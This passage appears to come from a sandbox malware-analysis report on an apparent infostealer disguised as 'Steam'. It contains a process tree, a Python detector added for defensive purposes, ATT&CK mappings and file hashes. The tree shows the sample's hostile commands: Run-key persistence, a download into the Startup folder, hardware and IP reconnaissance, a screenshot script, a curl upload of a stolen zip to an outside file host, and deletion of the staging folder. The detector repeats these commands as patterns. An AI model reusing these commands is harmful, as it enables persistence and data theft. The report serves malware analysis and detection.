            [7] PID 2852  C:\Windows\system32\reg.exe
                cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\xylex.exe" /f
                signatures: Adds Run key to start application; Modifies registry key
            [7] PID 4448  C:\Windows\system32\reg.exe
                cmdline: reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
                signatures: Modifies registry key
            [7] PID 4024  C:\Windows\system32\curl.exe
                cmdline: curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
      [4] PID 760  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
          signatures: Suspicious use of WriteProcessMemory
        [5] PID 4756  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic baseboard get serialnumber
      [4] PID 2796  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        [5] PID 4288  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic MemoryChip get /format:list
        [5] PID 3276  C:\Windows\system32\find.exe
            cmdline: find /i "Speed"
      [4] PID 4652  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
        [5] PID 5060  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_computersystemproduct get uuid
      [4] PID 624  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
        [5] PID 5000  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed
      [4] PID 4444  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
        [5] PID 1752  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic PATH Win32_VideoController GET Description,PNPDeviceID
      [4] PID 2708  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
        [5] PID 4516  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 2052  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
        [5] PID 4996  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic memorychip get serialnumber
      [4] PID 4664  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
        [5] PID 2360  C:\Windows\system32\curl.exe
            cmdline: curl http://api.ipify.org/ --ssl-no-revoke
            signatures: Blocklisted process makes network request
      [4] PID 4404  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
        [5] PID 2404  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic csproduct get uuid
      [4] PID 4288  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
        [5] PID 2884  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic bios get smbiosbiosversion
      [4] PID 4472  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
        [5] PID 4912  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic cpu get processorid
      [4] PID 3864  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        [5] PID 332  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic MemoryChip get /format:list
        [5] PID 1724  C:\Windows\system32\find.exe
            cmdline: find /i "Speed"
      [4] PID 528  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
        [5] PID 624  C:\Windows\system32\getmac.exe
            cmdline: getmac /NH
      [4] PID 1752  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
        [5] PID 60  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed
      [4] PID 3988  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
        [5] PID 2396  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 4952  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
        [5] PID 4804  C:\Windows\system32\curl.exe
            cmdline: curl http://api.ipify.org/ --ssl-no-revoke
      [4] PID 992  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
        [5] PID 4476  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic bios get smbiosbiosversion
      [4] PID 4884  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        [5] PID 2796  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic MemoryChip get /format:list
        [5] PID 4652  C:\Windows\system32\find.exe
            cmdline: find /i "Speed"
      [4] PID 4288  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
        [5] PID 2100  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed
      [4] PID 2264  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
        [5] PID 1364  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
            signatures: Suspicious behavior: EnumeratesProcesses
      [4] PID 224  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
        [5] PID 2124  C:\Windows\system32\curl.exe
            cmdline: curl http://api.ipify.org/ --ssl-no-revoke
      [4] PID 3860  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
        [5] PID 1876  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic bios get smbiosbiosversion
      [4] PID 4264  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
        [5] PID 2708  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
            signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
      [4] PID 3472  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";"
        [5] PID 1556  C:\Windows\system32\curl.exe
            cmdline: curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";
      [4] PID 2476  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
        [5] PID 560  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic MemoryChip get /format:list
        [5] PID 3444  C:\Windows\system32\find.exe
            cmdline: find /i "Speed"
      [4] PID 4048  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
        [5] PID 3140  C:\Windows\System32\Wbem\WMIC.exe
            cmdline: wmic path win32_VideoController get name
            signatures: Detects videocard installed
      [4] PID 4756  C:\Windows\system32\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
        [5] PID not shown (the report is cut off here)  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
- Suspicious behavior: EnumeratesProcesses
PID:4260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:484
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:4380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:3508
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:4492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:4588
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:2352
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:1288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:5100
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:3440
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:2164
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:3452
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:2100
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:1820
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:3708
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:3792
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:1284
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:4080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:4588
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:1860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""4⤵PID:4428
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:1876
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:3860
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:2544
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:4148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:4248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:5084
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:3140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:896
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:4664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:4188
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:4260
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:4208
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:1800
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:5024
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:640
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:3348
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:4052
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:5060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:2636
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:1504
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"4⤵PID:4856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵PID:4048
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:4912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵PID:1180
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵PID:2100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""4⤵PID:752
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list5⤵PID:2720
-
-
C:\Windows\system32\find.exefind /i "Speed"5⤵PID:4028
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"4⤵PID:1796
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:2260
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3920
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5100
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log1⤵
- Opens file in notepad (likely ransom note)
PID:2636
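Added example, not part of this report or of the sample: a small detector written for this page that runs the recon, collection, exfiltration and cleanup stages visible in the tree above over process-creation events. The event shape (Image, CommandLine, ProcessId, as in a Sysmon Event ID 1 or EDR feed), the sample events (constructed from the command lines in the report, with illustrative PIDs) and the verdict thresholds in analyze() are this example's assumptions, not the sandbox's scoring.

```python
"""Added example (not from the report or the sample): stage detection for the
recon -> collection -> exfiltration -> cleanup chain shown in the tree above.
Event shape, sample PIDs and verdict thresholds are this example's assumptions."""
import re
from collections import Counter

# One pattern per recon artefact the sample collects (see the tree above).
RECON_PATTERNS = {
    "gpu":       re.compile(r"wmic\s+path\s+win32_videocontroller\s+get\s+name", re.I),
    "os":        re.compile(r"get-itempropertyvalue\b.*currentversion.*-name\s+productname", re.I),
    "public_ip": re.compile(r"curl\s+https?://api\.ipify\.org", re.I),
    "bios":      re.compile(r"wmic\s+bios\s+get\s+smbiosbiosversion", re.I),
    "ram":       re.compile(r"wmic\s+memorychip\s+get\b", re.I),
}
SCREENSHOT = re.compile(r'powershell\b.*-executionpolicy\s+bypass\b.*-file\s+"?[^"]*capturescreens\.ps1', re.I)
EXFIL = re.compile(r'curl\b.*--request\s+POST\b.*--form\s+"?file=@', re.I)
EXFIL_PATH = re.compile(r'file=@([^"\s;]+)')
CLEANUP = re.compile(r'rmdir\s+/s\s+/q\s+"?([^"]+)', re.I)


def classify(cmdline):
    """Map one command line to (stage, detail); (None, None) if not of interest."""
    if EXFIL.search(cmdline):
        m = EXFIL_PATH.search(cmdline)
        return "exfil", (m.group(1) if m else "")
    m = CLEANUP.search(cmdline)
    if m:
        return "cleanup", m.group(1).rstrip("\\/")
    if SCREENSHOT.search(cmdline):
        return "collection", "CaptureScreens.ps1"
    for name, pattern in RECON_PATTERNS.items():
        if pattern.search(cmdline):
            return "recon", name
    return None, None


def _norm(path):
    return path.replace("\\", "/").lower()


def analyze(events):
    """Correlate the classified events of one host into a verdict."""
    stages = Counter()
    recon, exfil, cleanup = set(), set(), set()
    for ev in events:
        stage, detail = classify(ev["CommandLine"])
        if stage is None:
            continue
        stages[stage] += 1
        # cmd.exe /d /s /c "X" and its child X carry the same text: keep sets, not counts.
        if stage == "recon":
            recon.add(detail)
        elif stage == "exfil":
            exfil.add(detail)
        elif stage == "cleanup":
            cleanup.add(detail)
    # The wiped directory is the one the uploaded archive was read from:
    # the sample deletes its own staging area, not user data.
    staged_then_wiped = any(_norm(p).startswith(_norm(d) + "/")
                            for p in exfil for d in cleanup)
    if len(recon) >= 3 and exfil and staged_then_wiped:
        verdict = "infostealer"
    elif exfil:
        verdict = "exfil"
    elif recon:
        verdict = "recon"
    else:
        verdict = "clean"
    return {"recon": sorted(recon), "collection": stages["collection"] > 0,
            "exfil": sorted(exfil), "cleanup": sorted(cleanup),
            "staged_then_wiped": staged_then_wiped, "verdict": verdict}


# Constructed events modelled on the tree above; PIDs are illustrative.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\Wbem\WMIC.exe", "ProcessId": 60,
     "CommandLine": "wmic path win32_VideoController get name"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": 2396,
     "CommandLine": r"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"},
    {"Image": r"C:\Windows\system32\curl.exe", "ProcessId": 4804,
     "CommandLine": "curl http://api.ipify.org/ --ssl-no-revoke"},
    {"Image": r"C:\Windows\System32\Wbem\WMIC.exe", "ProcessId": 4476,
     "CommandLine": "wmic bios get smbiosbiosversion"},
    {"Image": r"C:\Windows\system32\cmd.exe", "ProcessId": 4884,
     "CommandLine": r'C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ProcessId": 2708,
     "CommandLine": r'powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"'},
    {"Image": r"C:\Windows\system32\curl.exe", "ProcessId": 1556,
     "CommandLine": r'curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Bvrkipts.zip";'},
    {"Image": r"C:\Windows\system32\cmd.exe", "ProcessId": 4428,
     "CommandLine": r'C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""'},
    {"Image": r"C:\Windows\system32\curl.exe", "ProcessId": 9001,  # benign control
     "CommandLine": "curl https://example.com/ -o page.html"},
]

if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The strongest single signal in this chain is not any one recon command (each is legitimate admin tooling on its own) but the pairing of the curl multipart upload with the rmdir /s /q of the directory the archive was read from; the recon commands only raise confidence once that pairing is present.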
MITRE ATT&CK Enterprise v15

Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Downloads
Filesize 1KB
  MD5    bc25719509480417948ca1fd6bfe19b1
  SHA1   eb76c0bc5714f00581cc602b892a1ba51455677a
  SHA256 28aa94f334201e3573b6802602c841fa42066465ddc55200946aaec6ccd54723
  SHA512 e0c67ed7ff35ef0f6ddf40640dac7c251898751592abac174ba83918f4ae8c2a2dae9ef921ade4edc5c0fb83434b4528e2185847905f0eaa40fe79170368318a

Filesize 2KB
  MD5    1f57ead36e72c20677b25f9a4947b5a8
  SHA1   77f12e19846d51ab28c85a87642bc260e51a2a48
  SHA256 555774cb836bae06d2714767fb5d28934fd17632904057b7b21a2fd9dae86f2d
  SHA512 e69f962b48e7afd0e0e06d1ffa4ac377f5e6f9cb0f33d064ede91e5534b54c8af8359ae27d6743efadbb3fe1ae1ac7ec425a2dee039fc658f63a399a4453ab6e

Filesize 94B
  MD5    2f308e49fe62fbc51aa7a9b987a630fe
  SHA1   1b9277da78babd9c5e248b66ba6ab16c77b97d0b
  SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
  SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

Filesize 70B
  MD5    8a0ed121ee275936bf62b33f840db290
  SHA1   898770c85b05670ab1450a96ea6fbd46e6310ef6
  SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
  SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

Filesize 15B
  MD5    675951f6d9d75fd2c9c06b5ff547c6fd
  SHA1   9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
  SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
  SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

Filesize 78B
  MD5    c5e74f3120dbbd446a527e785dfe6d66
  SHA1   11997c2a53d19fd20916e49411c7a61bfb590e9c
  SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
  SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

Filesize 432KB
  MD5    9b3a4ea8cd3c25de41cb6c1262a82bfb
  SHA1   65b8f1a5268b26b7bdaf67a3f4f74cf93bafa2aa
  SHA256 424b23e5f4d41a7da8695bafcfa32aaf80b76886e186e9ffe892244f46525f9f
  SHA512 2ef965491443f14cf241e89367a98f0953d600cfa47bfca6ad707e429953648c015066a7fae855495770447c44cdcf53b584b48a767810fffedd1b849d34f033

Filesize 506B
  MD5    6e17bb9f135fc60247d4ab56686dc384
  SHA1   90a428b6aad7ea6ddd7ca81ca13f7d94eb65084a
  SHA256 c4e0bc1cee91414b7037b605506a949bcfb52d0e17dfcb9e2759f8116ed5eaf3
  SHA512 5d0861970910f011f9d61e74ec3230f2a904fd057e831bf3aa0cec5ade8e15d46ff1ed2692aff5aee35547a9366ac95a5432a912201515b9b07ad2fd34f61912

Filesize 1KB
  MD5    22527842b4acba054d7debb694ec53e3
  SHA1   3a2d86fe510b8b421ef6e526e5d694c84e9dad36
  SHA256 c2ba5253b252dfcba5525311a5285250198a7ed78fddb3d53cb39002c37bd600
  SHA512 8cd2b11628a0ccc25c70b6013451248d93b3edacdcbb390f2437fa1bf52aa7616a0fe90c1c08d4bed09877da40f72a4ee44a7d42dea03f394db3f4a2ce0c2898

Filesize 1KB
  MD5    26fc8dc0817cf2ae257954c04981f5c5
  SHA1   310ac5182cb91fb239adbc2aefc3e38e2d4a6026
  SHA256 be101d298af62869c52d64e44bd38b07bfd5b1650c590ada0ed42195dad7767b
  SHA512 3cd5fc4f39b7d870d94670d71cee7ca79aab28f44f1e46336d2ea9ad67e5bfc00c65adc07b6b7400cc88f2acf0a256b924eb64cbdfd2d162436abbe3cab780f4

Filesize 22B
  MD5    76cdb2bad9582d23c1f6f4d868218d6c
  SHA1   b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
  SHA256 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
  SHA512 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f

Filesize 1KB
  MD5    d3b739de1f6ef672ff1862078b77fc74
  SHA1   6fcbc1d4b53c94e23f16b4be320c5a91fb1c6521
  SHA256 157828e31fb5f21769014e59c2abb142667437cd8683b80142a5e021a772b0d9
  SHA512 0a108264bedc6ebdc8b9a364cf155aabcee8bbfe50b6a74df53bd47eff58abf0b6cb7e53102cce3c01d2edba87696c1eb2458a24e93865b438f539fb57755e7a

Filesize 3KB
  MD5    a8834c224450d76421d8e4a34b08691f
  SHA1   73ed4011bc60ba616b7b81ff9c9cad82fb517c68
  SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
  SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

Filesize 146B
